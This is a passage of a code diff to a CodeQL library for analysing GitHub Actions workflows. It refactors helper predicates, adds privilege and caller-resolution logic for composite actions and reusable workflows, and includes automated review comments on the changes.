0)) and - value = trimQuotes(assignment.splitAt("=", 1)) - or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) - ) - } - - bindingset[var] - private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - 
// echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" - } - - bindingset[var] - private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" - } - - bindingset[script, var] - predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) - ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) - ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - 
.regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) - ) - } - - bindingset[line] - predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) - ) - } - - predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) - } - - predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) - } - - predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) - } -} +import codeql.actions.Helper class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -193,7 +39,7 @@ class Expression extends AstNode instanceof ExpressionImpl { string getRawExpression() { result = rawExpression } - string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } + string getNormalizedExpression() { result = normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ 
@@ -227,6 +73,10 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACaller() { result = super.getACaller() } + + predicate isPrivileged() { super.isPrivileged() } } /** @@ -273,6 +123,8 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { Input getAnInput() { result = super.getAnInput() } Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } } class Input extends AstNode instanceof InputImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll new file mode 100644 index 00000000000..416cb97c8d0 --- /dev/null +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -0,0 +1,209 @@ +private import codeql.actions.Ast +private import codeql.Locations + +bindingset[expr] +string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") + .regexpReplaceAll("\\s*\\.\\s*", ".") +} + +bindingset[regex] +string wrapRegexp(string regex) { + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] +} + +bindingset[str] +private string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") +} + +bindingset[line, var] +predicate extractLineAssignment(string line, string var, string key, string value) { + exists(string assignment | + // single line assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + count(assignment.splitAt("=")) = 2 and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) + or + // workflow command assignment + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value = trimQuotes(assignment.splitAt("::", 1)) + ) +} + +bindingset[var] +private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV + result = + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" + result 
= + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?.*" +} + +bindingset[var] +private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +} + +bindingset[script, var] +predicate extractMultilineAssignment(string script, string var, string key, string value) { + // multiline assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) + ) + or + // multiline block assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + "$(" + + trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + "(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") + ")" and + key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) + ) + or + // multiline heredoc assignment + exists(string flattenedScript | + flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and + value = + trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) + .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + + 
"(\\})?(\"|')?", "") + .replaceAll("::NEW_LINE::", "\n") + .trim() + .splitAt("\n") and + key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) +} + +bindingset[line] +predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) +} + +predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) +} + +predicate writeToGitHubOutput(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +} + +predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) +} + +predicate inPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a privileged composite action + a = node.getEnclosingCompositeAction() and + ( + a.isPrivileged() + or + exists(Job caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + // node is in a privileged and externally triggereable job + j = node.getEnclosingJob() and + // job is privileged (write access or access to secrets) + j.isPrivileged() and + // job is triggereable by an external user + j.isExternallyTriggerable() + ) +} + +predicate inNonPrivilegedCompositeAction(AstNode node) { + 
exists(CompositeAction a | + // node is in a non-privileged composite action + a = node.getEnclosingCompositeAction() and + not a.isPrivileged() and + not exists(LocalJob caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) +} + +predicate inNonPrivilegedJob(AstNode node) { + exists(Job j | + // node is in a non-privileged or not externally triggereable job + j = node.getEnclosingJob() and + ( + // job is non-privileged (no write access and no access to secrets) + not j.isPrivileged() + or + // job is triggereable by an external user + not j.isExternallyTriggerable() + ) + ) +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 46bbcaaf29e..ebe2c70533d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations -private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.Helper private import codeql.actions.dataflow.ExternalFlow /** 
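Review bot: In `inPrivilegedCompositeAction` the first disjunct `a.isPrivileged()` holds without any check that a caller is externally triggerable, while `inPrivilegedExternallyTriggerableJob` requires both `isPrivileged()` and `isExternallyTriggerable()`. `CompositeActionImpl.isPrivileged()` in this commit already includes `this.getACaller().isPrivileged()`, so the second disjunct looks subsumed, and the same goes for the `not exists(...)` conjunct in `inNonPrivilegedCompositeAction`. If composite actions are meant to follow the job rule, drop `a.isPrivileged() or` here and make `inNonPrivilegedCompositeAction` the negation of what remains; otherwise state in a doc comment that trigger reachability is deliberately ignored for actions. Separately, in `inNonPrivilegedJob` the comment above `not j.isExternallyTriggerable()` should read `// job is not triggerable by an external user`.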
@@ -299,6 +299,47 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().getValue() = name } + + LocalJobImpl getACaller() { + exists(LocalJobImpl caller, string gwf_path, string path | + // the workflow files may not be rooted in the parent directory of .github/workflows + // extract the offset so we can remove it from the action path + gwf_path = + caller + .getLocation() + .getFile() + .getRelativePath() + .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and + path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and + caller.getAStep().(UsesStepImpl).getCallee() = + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + result = caller + ) + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + this.getACaller().isPrivileged() + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { 
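Review bot: `getACaller()` removes the workflow-root offset with `replaceAll(gwf_path, "")`, which deletes every occurrence of `gwf_path` in the action's relative path, not only the leading one. With an offset of `a/`, a constructed path such as `a/.github/actions/data/action.yml` also loses the `a/` inside `data/`, the `/action.yml` lookup then finds nothing, and no caller is resolved, so `isPrivileged()` can miss a privileged caller job. Strip the prefix only: bind `rel` to the relative path and use `rel.prefix(gwf_path.length()) = gwf_path and path = rel.suffix(gwf_path.length())`. The comment inside `hasExplicitSecretAccess` also says "the job" where the predicate checks the composite action.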
@@ -328,10 +369,10 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { string getName() { result = n.lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ - JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId } /** Gets a job within this workflow */ - JobImpl getAJob() { result = this.getJob(_) } + JobImpl getAJob() { result.getEnclosingWorkflow() = this } /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -368,6 +409,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().(YamlString).getValue() = name } + + ExternalJobImpl getACaller() { + result.getCallee() = this.getLocation().getFile().getRelativePath() + } } class RunsImpl extends AstNodeImpl, TRunsNode { @@ -649,12 +694,10 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; - YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and - runson = n.lookup("runs-on").(YamlMappingLikeNode) + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } override string toString() { result = "Job: " + jobId } 
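Review bot: `ReusableWorkflowImpl.getACaller()` compares `getCallee()` with the raw `getRelativePath()`, without the `.github/workflows/` offset handling that `CompositeActionImpl.getACaller()` applies in the same file. `ExternalJobImpl.getCallee()` is not visible in this hunk, so please confirm it returns a value in the same form as the relative path when the workflows are not rooted at the top of the checkout; if not, callers go unresolved and the privileged-caller check in `JobImpl.isPrivileged()` has nothing to work with. The new predicate also has no doc comment; I would add `/** Gets a job that calls this reusable workflow. */`.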
@@ -765,14 +808,9 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, JobImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getEnclosingJob() and - caller.isPrivileged() - ) + // The Workflow is a Reusable Workflow only and there is + // a privileged caller workflow + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or // The Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 @@ -781,14 +819,15 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent().getName() = trigger and - count(this.getATriggerEvent()) = 1 - } - + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(ScalarValueImpl lbl | + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | ( lbl.getNode() = runson.getNode(_) and not lbl.getNode() = runson.getNode("group") 
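Review bot: The new comment in `isPrivileged()` still describes the workflow as "a Reusable Workflow only", but the `hasSingleTrigger("workflow_call")` check was removed, and the following hunk leaves `hasSingleTrigger` behind as commented-out code. Reword the comment to match the condition, e.g. `// The workflow is a reusable workflow and one of its caller jobs is privileged`, and delete the commented-out predicate instead of keeping it in the class. `isPrivileged()` begins before this hunk, so its other branches are not visible here.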
@@ -960,14 +999,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - if u.getValue().matches("./%") - then result = u.getValue() - else + if u.getValue().indexOf("@") > 0 + then result = ( u.getValue().regexpCapture(usesParser(), 1) + "/" + u.getValue().regexpCapture(usesParser(), 2) ).toLowerCase() + else result = u.getValue() } /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ 
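Review bot: `getCallee()` now returns the raw `uses` value whenever it contains no `@`, so the doc comment above it ("owner and name of the repository") no longer describes every result. `CompositeActionImpl.getACaller()` in this commit compares that raw value with a prefix of `getRelativePath()`; please confirm that a `uses: ./...` reference and the relative path agree on the leading `./`, because a mismatch resolves no caller and the action is then never seen as called from a privileged job. A value that contains `@` but does not match `usesParser()` yields no callee at all; `usesParser()` is outside the hunk, so a test for that form would be worth adding.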
@@ -1061,27 +1100,26 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { - result = - Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } -private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } /** * Holds for an expression accesing the `secrets` context. @@ -1091,8 +1129,8 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -1110,9 +1148,9 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1142,9 +1180,9 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and + normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -1175,9 +1213,9 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } 
@@ -1200,8 +1238,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1225,8 +1263,8 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1251,8 +1289,8 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldAccess } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ba6430f157f..1fe4a3e7e1c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -186,8 +186,8 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = super.getAJob() or - child = super.getStrategy() + child = super.getStrategy() or + child = super.getAJob() ) and l = child.getLocation() | 
@@ -242,7 +242,26 @@ private class JobTree extends StandardPreOrderTree instanceof LocalJob { } } -private class UsesTree extends StandardPreOrderTree instanceof Uses { +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d9f7b14edd3..ca3e21e9d25 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -33,7 +33,7 @@ private predicate titleEvent(string context) { "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -46,7 +46,7 @@ private predicate urlEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } 
@@ -68,11 +68,9 @@ private predicate textEvent(string context) { "github\\.event\\.workflow_run\\.head_repository\\.description", // description "github\\.event\\.client_payload\\[[0-9]+\\]", // payload "github\\.event\\.client_payload", // payload - "github\\.event\\.inputs\\[[0-9]+\\]", // input - "github\\.event\\.inputs", // input ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -100,7 +98,7 @@ private predicate branchEvent(string context) { "github\\.event\\.merge_group\\.head_ref", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -114,7 +112,7 @@ private predicate labelEvent(string context) { "github\\.event\\.pull_request\\.head\\.label", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -134,7 +132,7 @@ private predicate emailEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -154,7 +152,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -168,7 +166,7 @@ private predicate pathEvent(string context) { "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } 
